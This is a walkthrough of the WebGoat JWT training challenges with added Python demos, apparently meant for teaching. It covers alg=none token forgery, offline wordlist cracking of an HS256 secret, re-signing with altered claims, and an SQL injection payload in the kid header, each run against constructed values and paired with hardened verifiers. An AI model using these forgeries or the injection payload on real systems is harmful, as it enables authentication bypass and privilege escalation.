JWT Token
3/
Use jwt.io to decode the token; the payload contains the username.
5/
After decoding, you will see that the algorithm is HS256 and admin is false.
First, edit alg to "none". Next, edit the admin value to "true". With alg set to none the signature segment is left empty, so the forged token ends with a trailing dot.


Edit cookie and send:

8/
First, we must find the key of this token, then change the username field to 'WebGoat' and re-sign it to solve this challenge (the algorithm is HS256).
I use 1000000-password-seclists.txt to brute-force it.
Code to find key:

I found that the key is 'victory'. Use this key to sign a modified token with the username changed to WebGoat:


When we submit it, we receive a message that the JWT token is expired:

Change the exp value to a time in the future, re-sign with the same key and submit the token again to solve this challenge:


10/
This challenge is similar to challenge 5.
Open the file logs.txt to get a token:

Intercept the request with Burp Suite and you will see the Authorization header:

We edit the token we got and then use it as the value of the Authorization header.
Set the algorithm to "none":

Edit the admin field to "true":

Send the request with the new token to solve the challenge:
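The alg=none bypass used in challenges 5 and 10, as an added example (this is not code from the page or from WebGoat): it rebuilds a token with alg set to none and admin set to true, then shows a verifier that trusts the header's alg accepting it while one that pins HS256 rejects it. The demo token, the secret DEMO_SECRET and the claim names are constructed here and are not the challenge's real values.

```python
import base64
import hashlib
import hmac
import json

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def decode_unverified(token: str):
    """What jwt.io shows: header and payload, signature ignored."""
    header_b64, payload_b64, _signature = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def forge_alg_none(token: str, **claim_changes) -> str:
    """Rebuild the token with alg=none, changed claims and an empty signature.
    The result ends with a trailing dot because the third segment is empty."""
    header, payload = decode_unverified(token)
    header["alg"] = "none"
    payload.update(claim_changes)
    compact = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    return f"{compact(header)}.{compact(payload)}."

def naive_verify(token: str, secret: bytes) -> dict:
    """Vulnerable pattern: the server lets the token's own header pick the
    algorithm, so alg=none means there is no signature to check."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "none":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(b64url_decode(signature_b64), expected):
            raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))

def strict_verify(token: str, secret: bytes) -> dict:
    """Hardened: the algorithm is fixed server-side and checked before the HMAC."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(signature_b64), expected):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))

# Constructed stand-in for the challenge token: HS256 header, non-admin payload.
# The signature segment is a placeholder, since the attack throws it away anyway.
DEMO_SECRET = b"not-the-real-secret"  # demo value only, not the challenge's key
DEMO_TOKEN = ".".join([
    b64url_encode(b'{"alg":"HS256"}'),
    b64url_encode(b'{"user":"guest","admin":false}'),
    b64url_encode(b"placeholder-signature"),
])

if __name__ == "__main__":
    forged = forge_alg_none(DEMO_TOKEN, admin=True)
    print("forged:", forged)
    print("naive server accepts:", naive_verify(forged, DEMO_SECRET))
    try:
        strict_verify(forged, DEMO_SECRET)
    except ValueError as err:
        print("strict server rejects:", err)
```

The fix on the server side is the one strict_verify shows: decide the algorithm in code and never let the token choose it; any real JWT library should be called with an explicit allow-list of algorithms.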

11/
First, use jwt.io to decode the token:

In the header you will see a "kid" parameter, which the other challenges did not have.
Take a look at the source code on WebGoat's GitHub:

Here we can see that the key is selected from the database where id = kid. We can use SQL injection to make the query return our own key.
Something like this:
When the query is executed, the key used to verify the JWT is 'key' (our own key).
But there is one more step: before this value is used as the JWT key, it is base64-decoded first:
So we must set the kid value to:
And finally, edit username to "Tom", delete exp and sign the token with 'key' as the key:


Submit the new token to solve the challenge:
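An added example covering challenges 8 and 11 together (not the page's own code, and not WebGoat's): a wordlist brute force of the HS256 secret, re-signing with a new username and a future exp, and the kid trick of challenge 11 against a simulated key lookup. The token, the five-word DEMO_WORDLIST standing in for 1000000-password-seclists.txt, the sqlite table jwt_keys and the query shape in lookup_key are all constructed assumptions; WebGoat's real query and payload are not reproduced here.

```python
import base64
import hashlib
import hmac
import json
import sqlite3
import time

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def decode_claims(token: str) -> dict:
    """Payload only, signature not checked (what jwt.io displays)."""
    return json.loads(b64url_decode(token.split(".")[1]))

def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    compact = lambda obj: b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{compact(header)}.{compact(payload)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"

def crack_hs256_secret(token: str, wordlist):
    """Challenge 8: recompute the HMAC with each candidate; the one that
    reproduces the signature is the secret. Returns None if it is not listed."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(signature_b64)
    for candidate in wordlist:
        candidate = candidate.strip().encode()
        if hmac.compare_digest(hmac.new(candidate, signing_input, hashlib.sha256).digest(), target):
            return candidate
    return None

def resign_with_claims(token: str, secret: bytes, **claim_changes) -> str:
    """Keep the header, change claims such as username and exp, sign again."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    payload = decode_claims(token)
    payload.update(claim_changes)
    return sign_hs256(header, payload, secret)

def is_expired(token: str, now: int) -> bool:
    exp = decode_claims(token).get("exp")
    return exp is not None and exp <= now

def build_demo_db():
    """Constructed stand-in for the key table the server is said to query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE jwt_keys (id TEXT, secret_b64 TEXT)")
    conn.execute("INSERT INTO jwt_keys VALUES ('webgoat_key', ?)",
                 (base64.b64encode(b"server-secret-we-never-learn").decode(),))
    return conn

def lookup_key(conn, kid: str, parameterised: bool) -> bytes:
    """Server-side kid lookup (hypothetical shape); the stored value is base64
    and is decoded before use. parameterised=False is the injectable version."""
    if parameterised:
        row = conn.execute("SELECT secret_b64 FROM jwt_keys WHERE id = ?", (kid,)).fetchone()
    else:
        row = conn.execute(f"SELECT secret_b64 FROM jwt_keys WHERE id = '{kid}'").fetchone()
    if row is None:
        raise ValueError("unknown kid")
    return base64.b64decode(row[0])

def forge_with_kid_injection(secret: bytes, payload: dict) -> str:
    """Challenge 11: choose a key, base64 it, and make the kid lookup return it."""
    kid = f"' UNION SELECT '{base64.b64encode(secret).decode()}' -- "
    return sign_hs256({"alg": "HS256", "kid": kid}, payload, secret)

def verify_with_kid(conn, token: str, parameterised: bool) -> dict:
    """Resolve the key through kid, then check the HS256 signature."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    secret = lookup_key(conn, json.loads(b64url_decode(header_b64))["kid"], parameterised)
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("bad signature")
    return decode_claims(token)

# Constructed inputs: an already-expired token signed with the key the writeup
# recovered ('victory') and a five-word list standing in for 1000000-password-seclists.txt.
DEMO_TOKEN = sign_hs256({"alg": "HS256"}, {"username": "user", "exp": 1500000000}, b"victory")
DEMO_WORDLIST = ["123456", "password", "qwerty", "victory", "letmein"]

if __name__ == "__main__":
    secret = crack_hs256_secret(DEMO_TOKEN, DEMO_WORDLIST)
    now = int(time.time())
    token = resign_with_claims(DEMO_TOKEN, secret, username="WebGoat")
    print("key:", secret, "still expired:", is_expired(token, now))
    print("fresh token:", resign_with_claims(token, secret, exp=now + 3600))
    conn = build_demo_db()
    forged = forge_with_kid_injection(b"key", {"username": "Tom"})
    print("injectable lookup accepts:", verify_with_kid(conn, forged, parameterised=False))
    try:
        verify_with_kid(conn, forged, parameterised=True)
    except ValueError as err:
        print("parameterised lookup rejects:", err)
```

Two things the code makes visible that the screenshots do not: the brute force only needs the signing input and the signature, so it runs fully offline at HMAC speed, which is why a short dictionary word like 'victory' is no protection at all; and the kid injection works only because the kid is concatenated into SQL, so the parameterised branch of lookup_key sees the whole payload as an unknown id and the forged token is rejected.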
